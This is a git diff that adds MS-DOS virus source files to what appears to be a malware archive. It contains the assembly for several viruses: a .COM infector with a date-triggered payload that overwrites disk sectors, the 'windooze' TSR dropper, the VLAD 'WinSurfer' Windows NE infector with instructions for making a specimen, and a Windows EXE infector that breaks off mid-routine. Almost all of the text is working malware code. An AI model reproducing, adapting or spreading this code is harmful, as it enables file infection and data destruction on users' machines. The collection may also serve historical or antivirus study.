mov ah,4Fh + int 21h + + cmp ax,12h + je loc_7 + lea dx,[si+2C8h] + add dx,24h +loc_6: + mov ah,3Dh + mov al,2 + int 21h + + mov bx,ax + mov ah,42h + mov al,2 + mov dx,0 + mov cx,0 + int 21h + + + push ax + sub ax,6 + mov dx,ax + mov ah,42h + mov al,0 + mov cx,0 + int 21h + + + mov ah,3Fh + mov cx,1 + lea dx,[si+14Bh] + int 21h + + + mov ah,byte ptr data_8+30h[si] + cmp ah,42h + jne loc_8 + jmp short loc_5 +loc_7: + jmp short loc_9 + db 90h +loc_8: + mov ah,42h + mov al,0 + mov dx,0 + mov cx,0 + int 21h + + + mov ax,3F00h + mov cx,3 + lea dx,[si+2C8h] + add dx,3 + int 21h + + + mov ax,4200h + mov dx,0 + mov cx,0 + int 21h + + + pop ax + sub ax,3 + mov byte ptr data_8+2Eh[si],al + mov byte ptr data_8+2Fh[si],ah + mov ah,40h + mov cx,3 + lea dx,[si+148h] + int 21h + + + mov ax,4202h + mov dx,0 + mov cx,0 + int 21h + + + mov ah,40h + lea dx,[si+100h] + mov cx,data_12[si] + int 21h + + + mov ax,4000h + lea dx,[si+2C8h] + add dx,3 + mov cx,3 + int 21h + + + jmp short loc_9 + db 90h +loc_9: + mov ah,3Eh + int 21h + + mov ah,41h + lea dx,[si+137h] + int 21h + + mov ah,2Ah + int 21h + + + cmp dh,2 + jne loc_14 + cmp dl,17h + je loc_10 + cmp dl,18h + je loc_11 + cmp dl,19h + je loc_12 + jmp short loc_14 + db 90h +loc_10: + mov ah,3Ch + lea dx,[si+119h] + mov cx,1 + int 21h + + jmp short loc_14 + db 90h +loc_11: + mov ah,3Ch + lea dx,[si+129h] + mov cx,1 + int 21h + + jmp short loc_14 + db 90h +loc_12: + mov al,2 +loc_13: + mov cx,96h + mov dx,0 + int 26h + + + + inc al + cmp al,4 + jne loc_13 +loc_14: + mov cx,3 + lea ax,[si+2C8h] + mov si,ax + mov di,100h + rep movsb + call sub_1 + int 20h + +ww endp + +sub_1 proc near + mov di,offset start + jmp di + db 'Why Windows ' +copyright db '(c)1992 MaZ / BetaBoys B.B' + db 90h, 90h, 90h +sub_1 endp + + +seg_a ends + + + + end start + diff --git a/MSDOS/Virus.MSDOS.Unknown.windooze.asm b/MSDOS/Virus.MSDOS.Unknown.windooze.asm new file mode 100644 index 00000000..eff08e1a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.windooze.asm @@ -0,0 +1,289 @@ +ideal +@date = 0355h ;21.10.1981 +@time = 8E79h ;17:51:50 +model tiny +codeseg +startupcode + jmp begin +; +macro intdos + pushf + call [dword cs:oi21] +endm +; +i21: push ax + xor al,al + cmp ah,3ch + jz okk + cmp ah,5bh + jz okk + cmp ah,3dh + jz okk + inc al + cmp ah,16h + jz okk + cmp ah,0fh + jnz ov0 +okk: jmp ok +ov0: cmp ah,1ah + jz setdta + mov [byte cs:funct],12h + cmp ah,12h + jz fndf + cmp ah,11h + jz fndf + mov [byte cs:funct],4fh + cmp ah,4eh + jz fndh + cmp ah,4fh + jz fndh +ov: pop ax + db 0eah +oi21 dw 0 +oi21s dw 0 +; +setdta: mov [cs:dta],dx + mov [cs:dta+2],ds + jmp ov +; +fndh: pop ax +fnd0: intdos + jc fex + pushf + push si di es ds + lds si,[dword cs:dta] +compar: cmp [word si+16h],@time + jnz f10 + cmp [word si+18h],@date + jnz f10 + pop ds es di si + popf + lds dx,[dword cs:dta] + db 0b4h +funct db 4fh + jmp fnd0 +f10: pop ds es di si + popf +fex: push ax bp + mov bp,sp + lahf + mov [ss:bp+8],ah + pop bp ax + iret +; +fndf: pop ax +fnf0: intdos + and al,al + jnz fex + pushf + push si di es ds + lds si,[dword cs:dta] + cmp [byte ds:si],0ffh + jnz f21 + add si,7 +f21: inc si + jmp compar +; +ok: push bx cx dx si di ds es + and al,al + jz nex + mov cx,6 + mov ax,cs + mov es,ax + lea di,[ok1] + mov si,dx + rep cmpsw + jnz nex + pop es ds di si dx cx bx ax + mov ax,1313h + iret +nex: + xor ax,ax + mov ds,ax + mov ax,[ds:90h] + push ax + mov ax,[ds:92h] + push ax + mov [word ds:90h],offset i24 + mov [word ds:92h],cs + + mov bx,[ds:46ch] + mov ax,cs + mov ds,ax + mov es,ax + test bx,6C1h + jnz no_chg + cmp [byte pauss],0 + jz chg1 + dec [byte pauss] + jmp no_chg +chg1: mov [pauss],80 + xor al,al + out 43h,al + jcxz $+2 + in al,40h + mov bl,al + in al,40h + add al,bl + and al,1fh + cmp al,'Z'-'A' + jbe xx1 + sub al,'Z'-'A' +xx1: add al,'A' + std + mov si,offset fname+6 + lea di,[si+1] + mov cx,7 + rep movsb + stosb +no_chg: + mov ah,5bh + lea dx,[fname] + mov cx,1 + intdos + jc term + mov bx,ax + mov ah,40h + mov cx,offset endcod-100h + mov dx,100h +; inc [cs:count] + mov [cs:flag],0 + intdos + cmp ax,offset endcod-100h + jnz ok1 + mov [cs:flag],1 +ok1: mov ax,5701h + mov cx,@time + mov dx,@date + intdos + + mov ah,3eh + intdos + cmp [cs:flag],1 + jz term + + lea dx,[fname] + mov ax,4301h + xor cx,cx + intdos + lea dx,[fname] + mov ah,41h +; dec [cs:count] + intdos +term: xor ax,ax + mov ds,ax + pop ax + mov [ds:92h],ax + pop ax + mov [ds:90h],ax +ok0: pop es ds di si dx cx bx + jmp ov +driv db 0 +flag db 0 +; +i24: mov al,3 + iret +; +begin: mov ah,16h + lea dx,[ok1] + int 21h + cmp ax,1313h + jnz b01 +b02: int 20h +b01: mov ax,[ds:2ch] + mov ds,ax + xor si,si + cld +b04: lodsb + and al,al + jnz b04 + lodsb + and al,al + jnz b04 + inc si + inc si +b05: mov bx,si +b06: lodsb + cmp al,':' + jz b05 + cmp al,'\' + jz b05 + and al,al + jnz b06 + mov cx,si + sub cx,bx + mov si,bx + mov di,offset fname + rep movsb + mov ah,2fh + int 21h + mov [cs:dta],bx + mov [cs:dta+2],es + mov [byte cs:pauss],0 + mov ax,cs + mov ds,ax + dec ax + mov es,ax + + mov cl,4 + mov ax,offset endpr-100h + add ax,15 + shr ax,cl + mov cx,[es:3] + sub [es:3],ax + mov bx,ax + mov ax,cs + add ax,[es:3] + sub ax,10h + mov [bseg],ax + cmp [byte es:0],'Z' + jz b10 + + push ds + mov ax,cs + add ax,cx + mov ds,ax + sub ax,bx + mov es,ax + sub ax,0fh + mov [cs:bseg],ax + xor si,si + mov di,si + mov cx,8 + rep movsw + add [es:3],bx + sub [es:1],bx + pop ds + +b10: mov ax,[bseg] + mov es,ax + mov si,100h + mov di,si + mov cx,offset endpr-100h + rep movsb + mov di,offset b03 + xchg di,[0ah] + xchg ax,[0ch] + mov [es:oter],di + mov [es:oter+2],ax + ret +b03: push ax bx ds es cs + pop ds + mov ax,3521h + int 21h + mov [oi21],bx + mov [oi21s],es + mov ax,2521h + lea dx,[i21] + int 21h + pop es ds bx ax + db 0eah +endcod = $ +oter dw 0 +bseg dw ? +count dw ? +pauss db ? +fname db 13 dup (?) +dta dw ?,? +endpr = $ +end \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.winsurfr.a86 b/MSDOS/Virus.MSDOS.Unknown.winsurfr.a86 new file mode 100644 index 00000000..49dad015 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.winsurfr.a86 @@ -0,0 +1,654 @@ + +;------------------------------------------------------------------------- +; +; WinSurfer Virus (c) 1995 VLAD incorporated. +; Written by qark and quantum. +; +; This virus is a parasitic TSR infector of NewEXE files. It works in +; protected mode only and infects on file execute. +; +; The executable infection code is by qark, while the interrupt handler +; code is by quantum. +; +; This virus contains no stealth of any form, a simple readonly attribute +; will stop the virus from writing, the time/date stamp is not preserved +; and there is no encryption of any form. Windows users are too dumb to +; notice anyway. +; +; To obtain a specimen of the virus, copy the compiled com file into the +; same directory as the file WINMINE.EXE and run it. Go into Windows +; and run the game 'Minesweeper'. Minesweeper should infect program +; manager direct action, so that next time windows is booted the virus +; will be resident. +; +; Possible Bugs and Improvements: +; 1) An error may be that if the file isn't exactly shift alignment sized +; the virus will overwrite some data at the end of the file or be +; incorrectly pointed. +; 2) An error may occur if the end of the segment table is less than eight +; bytes from a 512 byte divisor. +; 3) It may be possible to allocate buffer space without adding to virus +; size by changing the segment memory size in the segment table. At the +; moment the virus size is being doubled by the 512 byte read buffer we +; include in the disk image. +; +; Although the final virus was coded completely by quantum and I, many +; people helped by offering ideas, and windows documentation so I +; must give thanks to the following people: +; Screaming Radish, Stalker X, Dreadlord and some scandinavian dude. +; The most important help came from Malware who taught me the relocation +; entry ffff trick. +; +; Assemble with a86. +;------------------------------------------------------------------------- + + +;--Directly below is dropper code, ignore it, page down to the virus code-- + + mov ax,3d02h + mov dx,offset fname + int 21h + xchg bx,ax + + mov ah,3fh + mov cx,512 + mov dx,offset buffer + int 21h + + mov si,offset buffer + cmp word ptr [si+3ch],400h + je ok_dropper + int 20h +ok_dropper: + mov ax,word ptr [si+2] + mov word ptr ppage,ax + mov ax,word ptr [si+4] + mov word ptr pfile,ax + + mov ax,4200h + xor cx,cx + cwd + int 21h + + mov ah,40h + mov cx,offset setsp - offset header + mov dx,offset header + int 21h + + mov ax,4200h + xor cx,cx + mov dx,word ptr [si+3ch] + int 21h + + mov ah,3fh + mov cx,512 + mov dx,offset buffer + int 21h + + mov ax,word ptr [si+1ch] + inc word ptr [si+1ch] ;increase segment count + mov cl,8 + mul cl + + mov di,word ptr [si+22h] + add di,si + add di,ax + + mov ax,4202h + xor cx,cx + cwd + int 21h + + ;write in the new segment into the table + + mov cl,byte ptr [si+32h] + push bx + mov bx,1 + shl bx,cl + mov cx,bx + pop bx + div cx + + mov word ptr [di],ax + mov word ptr [di+2],winend-win_entry + mov word ptr [di+4],180h + mov word ptr [di+6],winend-win_entry + + mov ax,word ptr [si+14h] + mov word ptr winip2,ax + + mov word ptr [si+14h],0 + + mov ax,word ptr [si+16h] + mov word ptr wincs2,ax + mov ax,word ptr [si+1ch] ;new cs:ip + mov word ptr [si+16h],ax + + mov ah,40h + mov cx,winend-win_entry + 20h + mov dx,offset win_entry + int 21h + + add word ptr [si+4],512 + + add word ptr [si+24h],512 + add word ptr [si+26h],512 + add word ptr [si+28h],512 + add word ptr [si+2ah],512 + + mov dx,512 + mov ax,4200h + xor cx,cx + int 21h + + mov ah,40h + mov cx,512 + mov dx,offset buffer + int 21h + + mov ah,3eh + int 21h + + int 20h + +;--The New Windows DOS stub-- +header db 'MZ' +ppage dw 0 ;part page +pfile dw 0 ;file/512 + dw 0 ;relocation items + dw 10h ;header size/16 + dw 0 ;minmem + dw -1 ;maxmem + dw 0 ;SS + dw offset setsp - offset winstart ;SP + dw 0 ;checksum + dw 0 ;IP + dw 0 ;CS + dw 40h ;Relocation offset + dupsize1 equ 3ch - ($-offset header) + db dupsize1 dup (0) + dw 200h ;NE offset + dupsize2 equ 100h - ($-offset header) + db dupsize2 dup (0) +winstart: + call windowsmsg + db 'This program requires Microsoft Windows.',0dh,0ah,'$' +windowsmsg: + pop dx + push cs + pop ds + mov ah,9 + int 21h + mov ax,4c01h + int 21h + db 100 dup (0) +setsp: +;---end of fake dropper dos stub-- + +fname db 'winmine.exe',0 + + +;----Start of the Virus---All the above is the dropper code, ignore it------- + +win_entry: ;Infected windows executables start here. + jmp realenter + +int21start: ;Virus Int21 handler + + cmp ax,1894h ;Residency test ? + jnz nottest + mov cx,1234h + iret +nottest: + + pusha + push ds + push es + + cmp ah,4bh ;Windows is so dumb it uses DOS to + ;execute. + jnz return2int + call executing + +return2int: + + pop es + pop ds + popa + + db 0eah +oldint21 dw 0,0 + +executing: + + mov ax,3d02h ;Open file in DS:DX + int 21h + jnc ok_open + ret +ok_open: + push ax + mov ax,0ah ;This function makes our CS writable. + push cs + pop bx + int 31h + push ax + pop ds + pop bx + + mov ah,3fh ;Read first 512 bytes of EXE header. + mov cx,512 + mov dx,offset buffer-offset win_entry + int 21h + + mov si,offset buffer-offset win_entry + + cmp word ptr [si],'ZM' ;Not a COM file. + jne bad_open + cmp word ptr [si+18h],40h ;40h+ for NE exe's + jb bad_open + cmp word ptr [si+3ch],400h ;header will be below if + je fileisoktoinfect ;already infected... +bad_open: + jmp fileisunsuitable + +fileisoktoinfect: + sub word ptr [si+3ch],8 ;Change NE pointer. + sub word ptr [si+10h],8 ;Incase stack is end of header + + mov ax,4200h ;Lseek right back to the start. + xor cx,cx + cwd + int 21h + + mov ah,40h ;Rewrite the modified DOS header. + mov cx,512 + mov dx,offset buffer - offset win_entry + int 21h + jc bad_open ;Write fail.. outta here! + + mov ax,4200h ;Lseek to NE header. + xor cx,cx + mov dx,400h + int 21h + + mov ah,3fh ;Read in first 512 bytes. + mov cx,512 + mov dx,offset buffer - offset win_entry + int 21h + + ;Adjust header offsets. Any tables behind the segment table will + ;have their offset increased by eight because we are inserting a new + ;eight byte segment entry. + + mov ax,word ptr [si+22h] ;AX=Segment table offset. + cmp word ptr [si+4],ax + jb ok_et + add word ptr [si+4],8 +ok_et: + cmp word ptr [si+24h],ax + jb ok_rt + add word ptr [si+24h],8 +ok_rt: + cmp word ptr [si+26h],ax + jb ok_rnt + add word ptr [si+26h],8 +ok_rnt: + cmp word ptr [si+28h],ax + jb ok_mrt + add word ptr [si+28h],8 +ok_mrt: + cmp word ptr [si+2ah],ax + jb ok_int + add word ptr [si+2ah],8 +ok_int: + + mov ax,word ptr [si+1ch] + inc word ptr [si+1ch] ;Increase segment count. + mov cl,8 ;Assume less than 256 segments. + mul cl + + add ax,word ptr [si+22h] ;AX=Size of segment table. + xor dx,dx ;High order division value. + mov cx,512 ;512 byte portions are used + ; for the reads later on. + div cx + + mov word ptr [offset ne_size-offset win_entry],ax + ;How much we'll have to read. + mov word ptr [offset last_ne-offset win_entry],dx + ;Where the end of the segment table + ; will be when we read it into the + ; buffer. (The last buffer) + + ;Put the original CS:IP into our relocation table. + push word ptr [si+14h] + pop word ptr [offset newwinip2 - offset win_entry] + push word ptr [si+16h] + pop word ptr [offset newwincs2 - offset win_entry] + + ;Save the alignment shift count because we need that for calculating + ;the offset of our segment when writing the segment entry. + push word ptr [si+32h] + pop word ptr [offset al_shift - offset win_entry] + + ;Point CS:IP to the virus. + mov word ptr [si+14h],0 ;The new IP + mov ax,word ptr [si+1ch] + mov word ptr [si+16h],ax ;The new CS + + ;Initialise the lseek variable + mov word ptr [offset lseek-offset win_entry],400h + + ;The below code gets the NE header and keeps moving it forward by + ;eight bytes in 512 byte chunks. +move_header_forward: + mov ax,word ptr [offset ne_size-offset win_entry] + or ax,ax + jz last_page + + dec word ptr [offset ne_size-offset win_entry] + + mov ax,4200h ;Lseek to our current position. + xor cx,cx + mov dx,word ptr [offset lseek-offset win_entry] + sub dx,8 + int 21h + + mov ah,40h ;Write the header section out. + mov cx,512 + mov dx,si + int 21h + + ;Advance the pointer by 512. + add word ptr [offset lseek-offset win_entry],512 + + mov ax,4200h ;Lseek to the next chunk. + xor cx,cx + mov dx,word ptr [offset lseek-offset win_entry] + int 21h + + mov ah,3fh ;Read it. + mov dx,offset buffer - offset win_entry + mov cx,512 + int 21h + + jmp move_header_forward + +last_page: + mov ax,4202h ;Lseek to end of file. + xor cx,cx + cwd + int 21h ;File length into DX:AX + + ;DX:AX=File offset of our segment + ;Below section shifts the segment offset right by the alignment + ;shift value. + mov cl,byte ptr [offset al_shift - offset win_entry] + push bx + mov bx,1 + shl bx,cl + mov cx,bx + pop bx + div cx + + mov di,si + add di,word ptr [offset last_ne-offset win_entry] + + ;Adding the new segment table entry + mov word ptr [di],ax ;Segment offset + mov word ptr [di+2],offset winend-offset win_entry + mov word ptr [di+4],180h ;Segment attribute + ; 180h = NonMovable + Relocations + mov word ptr [di+6],offset winend-offset win_entry + + mov ax,4200h ;Lseek to next position. + xor cx,cx + mov dx,word ptr [offset lseek-offset win_entry] + sub dx,8 + int 21h + + mov ah,40h ;Write rest of NE header + new seg entry. + mov cx,word ptr [offset last_ne-offset win_entry] + add cx,8 ;Added segment entry means eight more. + mov dx,offset buffer - offset win_entry + int 21h + + ;Reset the relocatable pointer. + push word ptr [offset winip - offset win_entry] + push word ptr [offset wincs - offset win_entry] + mov word ptr [offset winip - offset win_entry],0 + mov word ptr [offset wincs - offset win_entry],0ffffh + + mov ax,4202h ;Lseek to end of file. + xor cx,cx + cwd + int 21h + + mov ah,40h ;Write main virus body. + mov cx,offset winend-offset win_entry + xor dx,dx + int 21h + + pop word ptr [offset wincs - offset win_entry] + pop word ptr [offset winip - offset win_entry] + + mov ah,40h ;Write the relocation item. + mov cx,offset winend-offset relocblk + mov dx,offset relocblk-offset win_entry + int 21h + +fileisunsuitable: + + mov ah,3eh ;Close file. + int 21h + + ret + + prefix db 'hell=' + windir db 'indir=' + systemfile db 'system.ini',0 + NE_Size dw 0 + Last_NE dw 0 + Al_Shift dw 0 + LSeek dw 0 + progman db 0 ;1=Program Manager + envir dw 0 ;environment segment + pathbuff db 142 dup (0) +realenter: + + pusha + push si + push di + push ds + push es + + mov ax,1686h ;Is DPMI available ? + int 2fh + or ax,ax + jz dpmifound +no_dpmi: + jmp alreadyinmem +dpmifound: + mov ax,000ah ;Make CS writable. + push cs ;Protected mode isn't protected. + pop bx + int 31h ;Use DPMI. + push ax + pop ds + + xor cx,cx ;Check if resident. + mov ax,1894h + int 21h + + cmp cx,1234h ;Must be resident.. + jz no_dpmi + + cmp byte ptr [offset progman - offset win_entry],1 + jne direct_progman + + mov byte ptr [offset progman - offset win_entry],0 + + ;Can't go TSR off any program but program manager. + mov ax,0204h ;Get real mode interrupt vector. + mov bl,21h + int 31h + + mov ds:[offset oldint21 - win_entry],dx + mov ds:[offset oldint21 - win_entry + 2],cx + + push cs + pop cx + mov dx,offset int21start-win_entry + mov ax,0205h + mov bl,21h + int 31h ;Set real mode interrupt vector. + jmp alreadyinmem + +direct_progman: + ;Next portion of code searches for the environment variable + ;'windir' and places that before the files we access. + + ;On entry ES=PSP + + mov ax,word ptr es:[2ch] ;PSP:[2ch]=Environment segment. + + cld + + mov es,ax + + mov al,'w' ;w from windir + mov cx,-1 + xor di,di + mov dx,di +dir_loop: + mov di,dx + repnz scasb + mov dx,di + mov si,offset windir-win_entry + push cx + mov cx,6 + repe cmpsb ;indir from windir + pop cx + jne dir_loop + mov si,di + mov ax,ds + push es + pop ds + mov es,ax + mov cx,128 + mov di,offset pathbuff-win_entry + rep movsb ;Move it into our path buffer. + push es + pop ds + + mov di,offset pathbuff-win_entry + mov al,0 + mov cx,128 + repnz scasb + mov byte ptr es:[di-1],'\' ;Add a slash behind the path. + mov si,offset systemfile -offset win_entry + mov cx,11 + rep movsb + + ;The below code reads in the 'system.ini' file and searches for + ;the 'shell=' value, and infects the program specified by it. + ;The windows shell (eg program manager) is always active in memory + ;and we use it to go resident off. + + mov ax,3d02h + mov dx,offset pathbuff -offset win_entry + int 21h + + jc alreadyinmem + xchg bx,ax + + mov ah,3fh + mov cx,512 + mov dx,offset buffer -offset win_entry + int 21h + + mov ah,3eh + int 21h + + push ds + pop es + + mov di,offset buffer-offset win_entry + mov dx,di + + cld + mov cx,512 +shell_loop: + mov di,dx + mov al,'s' ;The 's' in 'shell=' + repne scasb + jne alreadyinmem + mov dx,di + + mov si,offset prefix -offset win_entry ;Test for 'hell=' + push cx + mov cx,5 + repe cmpsb + pop cx + jne shell_loop + mov si,di ;Offset of filename into DX. + + mov al,'.' ;The dot in the filename extension. + mov cl,0ffh + repne scasb + add di,3 ;Point to past the filename. + mov byte ptr es:[di],0 ;Add a zero to make it asciiz. + + mov di,offset pathbuff-win_entry + mov al,0 + mov cx,128 + repnz scasb ;Search for the 0 at the path end. + dec di + mov al,'\' ;Now find the last backslash. + mov cx,128 + std ;Scan backwards. + repnz scasb + cld + inc di ;DI points behind the final '\' + inc di + mov cx,15 + rep movsb ;Append the shell program name. + mov dx,offset pathbuff-win_entry + + mov byte ptr [offset progman - offset win_entry],1 + call executing + mov byte ptr [offset progman - offset win_entry],0 + +alreadyinmem: + + pop es + pop ds + pop di + pop si + popa + + db 0eah ;JMP FAR PTR xxxx:xxxx +winip dw 0 +wincs dw 0ffffh ;Needs to be FFFF due to windows + ; relocation item format. +buffer db 512 dup (0) + +;Below is the relocation item format. What ours does is turn the far jump +; above us into a jump to the original CS:IP. +relocblk dw 1 ;Signal only one relocation item. + db 3 ;32 bit pointer relocation. + db 4 ;Additive relocation (unsure, but + ; it doesnt work unless you put this) + dw offset winip-offset win_entry ;Relocation offset. +newwincs2 dw 0 ;Target of the relocation. (We use +newwinip2 dw 0 ; the original host CS:IP) + +winend: ;The actual virus ends here. +;-----End of the Virus---Below is dropper code----------------------------- + dw 1 + db 3 + db 4 + dw offset winip - offset win_entry +wincs2 dw 0 +winip2 dw 0 + diff --git a/MSDOS/Virus.MSDOS.Unknown.winvir.asm b/MSDOS/Virus.MSDOS.Unknown.winvir.asm new file mode 100644 index 00000000..3cc26f71 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.winvir.asm @@ -0,0 +1,688 @@ +;A Basic Windows-EXE infecting virus. Launched as a DOS COM file. + + .model small + + .code + +;All code must be offset-relocatable. +;All data is stored on the stack. + +;Useful constants +NEW_HDR_SIZE EQU 40H ;size of new EXE header + +;The following are used to access data on the stack. The first 512 bytes are +;a buffer for disk reads/writes. +FILE_ID EQU 200H ;"*.EXE" constant +ENTRYPT EQU 206H ;ip of virus start +VIRSTART EQU 208H ;offset of virus start in cs +NH_OFFSET EQU 20AH ;new EXE header offset from file start +VIRSECS EQU 20CH ;size added to file, in sectors for virus +INITSEC EQU 20EH ;initial cs location in file (sectors) +RELOCS EQU 210H ;number of relocatables in initial cs +LOG_SEC EQU 212H ;logical sector size for pgm +CS_SIZE EQU 214H ;size of all data in code seg, including rels, not virus +NEW_HDR EQU 216H ;new EXE header + +;The following gives the size of the virus, in bytes +VIRUS_SIZE EQU OFFSET END_VIRUS - OFFSET VIRUS + + ORG 100H + +;****************************************************************************** +;This is the main virus routine. It simply finds a file to infect and infects +;it, and then passes control to the host program. It resides in the first +;segment of the host program, that is, the segment where control is initially +;passed. + +VIRUS: + push ax ;save all registers + push bx + push cx + push dx + push si + push di + call VIR_START +VIR_START: + pop bx + sub bx,3+6 + push bp ;save segments and bp + push ds + push es + mov ax,ss ;all viral data is in stack segment + mov ds,ax + mov es,ax + sub sp,512+128 ;data area + mov bp,sp ;bp indexes data + mov [bp+VIRSTART],bx ;save virus starting offset here + call FIND_FILE ;find a viable file to infect + jnz GOTO_HOST ;z set if a file was found + call INFECT_FILE ;infect it if found +GOTO_HOST: + add sp,512+128 + pop es + pop ds + pop bp + pop di + pop si + pop dx + pop cx + pop bx + pop ax +VIRUS_DONE: + jmp HOST ;pass control to host program + +;****************************************************************************** +;This routine searches for a file to infect. It looks for EXE files and then +;checks them to see if they're uninfected, infectable Windows files. If a file +;is found, this routine returns with Z set, with the file left open, and its +;handle in the bx register. This FIND_FILE searches only the current directory. + +FIND_FILE: + mov di,bp ;first, put '*.EXE',0 on stack + add di,FILE_ID ;at this location + mov dx,di ;set dx up for search first + mov ax,2E2AH ;*. + stosw + mov ax,5845H ;EX + stosw + mov ax,0045H ;E(0) + stosw + xor cx,cx ;file attribute + mov ah,4EH ;search first + int 21H +FIND_LOOP: + or al,al ;see if search successful + jnz FIND_EXIT ;nope, exit with NZ set + call FILE_OK ;see if it is infectable + jz FIND_EXIT ;yes, get out with Z set + mov ah,4FH ;no, search for next file + int 21H + jmp SHORT FIND_LOOP +FIND_EXIT: ;pass control back to main routine + ret + +;This routine determines whether a file is ok to infect. The conditions for an +;OK file are as follows: +; +; (1) It must be a Windows EXE file. +; (2) There must be enough room in the initial code segment for it. +; (3) The file must not be infected already. +; +;If the file is OK, this routine returns with Z set, the file open, and the +;handle in bx. If the file is not OK, this routine returns with NZ set, and +;it closes the file. This routine also sets up a number of important variables +;as it snoops through the file. These are used by the infect routine later. +FILE_OK: + push ds + push es ;save seg registers + mov ah,2FH + int 21H ;get current DTA address in es:bx + push es + push ds + pop es + pop ds ;exchange ds and es + mov dx,bx ;put address in ds:dx + add dx,30 ;set ds:dx to point to file name + mov ah,3DH ;ok, now open the file + mov al,01000010B ;flags, read/write, etc. + int 21H + pop es + pop ds ;restore seg registers + jnc FOK1 ;error on opening? + jmp FOK_ERROR2 ;yes, exit now +FOK1: mov bx,ax ;open ok, put handle in bx + mov ah,3FH ;now read EXE header + mov dx,bp ;ds:dx points to file buffer + mov cx,40H ;read 40H bytes + int 21H + jc FN1 ;exit on error + cmp [bp],5A4DH ;see if first 2 bytes are 'MZ' + jnz FN1 ;nope, file not an EXE, exit + cmp WORD PTR [bp+18H],40H ;see if reloc table is at 40H or more + jc FN1 ;nope, it can't be a Windows EXE + mov dx,[bp+3CH] ;ok, put offset to new header in dx + mov [bp+NH_OFFSET],dx ;and save it here + xor cx,cx + mov ax,4200H ;now do a seek from start + int 21H + jc FN1 + mov ah,3FH + mov cx,NEW_HDR_SIZE ;now read the new header + mov dx,bp ;into memory + add dx,NEW_HDR + int 21H + jc FN1 ;exit if there is an error + cmp [bp+NEW_HDR],454EH ;see if this is 'NE' new header ID + jnz FN1 ;nope, not a Windows EXE! + mov al,[bp+36H+NEW_HDR] ;get target OS flags + and al,2 ;see if target OS = windows + jnz FOK2 ;ok, go on +FN1: jmp FOK_ERROR1 ;else exit + +;If we get here, then condition (1) is fulfilled. + +FOK2: mov dx,[bp+16H+NEW_HDR] ;get initial cs + call GET_SEG_ENTRY ;and read seg table entry into disk buf + jc FOK_ERROR1 + mov ax,[bp+2] ;put segment length in ax + add ax,VIRUS_SIZE ;add size of virus to it + jc FOK_ERROR1 ;if we carry, there's not enough room + ;else we're clear on this count + +;If we get here, then condition (2) is fulfilled. + + mov cx,[bp+NEW_HDR+32H] ;logical sector alignment + mov ax,1 + shl ax,cl ;ax=logical sector size + mov cx,[bp] ;get logical-sector offset of start seg + mul cx ;byte offset in dx:ax + add ax,WORD PTR [bp+NEW_HDR+14H];add in ip of entry point + adc dx,0 + mov cx,dx + mov dx,ax ;put entry point in cx:dx + mov ax,4200H ;and seek from start of file + int 21H + jc FOK_ERROR1 + mov ah,3FH + mov cx,20H ;read 32 bytes + mov dx,bp + int 21H ;into buffer + jc FOK_ERROR1 + mov di,bp + mov si,[bp+VIRSTART] ;get starting offset of virus in cs + mov cx,10H ;compare 32 bytes +FOK3: mov ax,cs:[si] ;of virus at cs + add si,2 + add di,2 + cmp ax,[di-2] ;with code in buffer + loopz FOK3 + jz FOK_ERROR1 ;already there, exit not ok + +;If we get here, then condition (3) is fulfilled, all systems go! + + xor al,al ;set Z flag + ret ;and exit + +FOK_ERROR1: + mov ah,3EH ;close file before exiting + int 21H +FOK_ERROR2: + mov al,1 + or al,al ;set NZ + ret ;and return to caller + +;****************************************************************************** +;This routine modifies the file we found to put the virus in it. There are a +;number of steps in the infection process, as follows: +; 1) We have to modify the segment table. For the initial segment, this +; involves (a) increasing the segment size by the size of the virus, +; and (b) increase the minimum allocation size of the segment, if it +; needs it. Every segment AFTER this initial segment must also be +; adjusted by adding the size increase, in sectors, of the virus +; to it. +; 2) We have to change the starting ip in the new header. The virus is +; placed after the host code in this segment, so the new ip will be +; the old segment size. +; 3) We have to move all sectors in the file after the initial code segment +; out by VIRSECS, the size of the virus in sectors. +; 4) We have to move the relocatables, if any, at the end of the code +; segment we are infecting, to make room for the virus code +; 5) We must move the virus code into the code segment we are infecting. +; 6) We must adjust the jump in the virus to go to the original entry point. +; 7) We must adjust the resource offsets in the resource table to reflect +; their new locations. +; 8) We have to kill the fast-load area. +; +INFECT_FILE: + mov dx,[bp+NEW_HDR+24H] ;get resource table @ + add dx,[bp+NH_OFFSET] + xor cx,cx + mov ax,4200H + int 21H + mov dx,bp + add dx,LOG_SEC ;read logical sector size + mov ah,3FH + mov cx,2 + int 21H + mov cx,[bp+LOG_SEC] + mov ax,1 + shl ax,cl + mov [bp+LOG_SEC],ax ;put logical sector size here + + mov ax,[bp+NEW_HDR+14H] ;save old entry point + mov [bp+ENTRYPT],ax ;for future use + + mov dx,[bp+NEW_HDR+16H] ;read seg table entry + call GET_SEG_ENTRY ;for initial cs + + mov ax,[bp] ;get location of this seg in file + mov [bp+INITSEC],ax ;save that here + mov ax,[bp+2] ;get segment size + mov [bp+NEW_HDR+14H],ax ;update entry ip in new header in ram + call SET_RELOCS ;set up RELOCS and CS_SIZE + + mov ax,VIRUS_SIZE ;now calculate added size of segment + add ax,[bp+CS_SIZE] ;ax=total new size + xor dx,dx + mov cx,[bp+LOG_SEC] + div cx ;ax=full sectors in cs with virus + or dx,dx ;any remainder? + jz INF05 + inc ax ;adjust for partially full sector +INF05: push ax + mov ax,[bp+CS_SIZE] ;size without virus + xor dx,dx + div cx + or dx,dx + jz INF07 + inc ax +INF07: pop cx + sub cx,ax ;cx=number of secs needed for virus + mov [bp+VIRSECS],cx ;save this here + + call UPDATE_SEG_TBL ;perform mods in (1) above on file + + mov ax,4200H ;now move file pointer to new header + mov dx,[bp+NH_OFFSET] + xor cx,cx + int 21H + + lea di,[bp+NEW_HDR+37H] ;zero out fast load area + xor ax,ax + stosb + stosw + stosw ;(8) completed + mov ah,40H ;and update new header in file + mov dx,bp ;(we updated the entry point above) + add dx,NEW_HDR + mov cx,NEW_HDR_SIZE + int 21H ;mods in (2) above now complete + + call MOVE_END_OUT ;move end of virus out by VIRSECS (3) + ;also sets up RELOCS count + cmp WORD PTR [bp+RELOCS],0 ;any relocatables in cs? + jz INF1 ;nope, don't need to relocate them + call RELOCATE_RELOCS ;relocate relocatables in cs (4) +INF1: call WRITE_VIRUS_CODE ;put virus into cs (5 & 6) + call UPDATE_RES_TABLE ;update 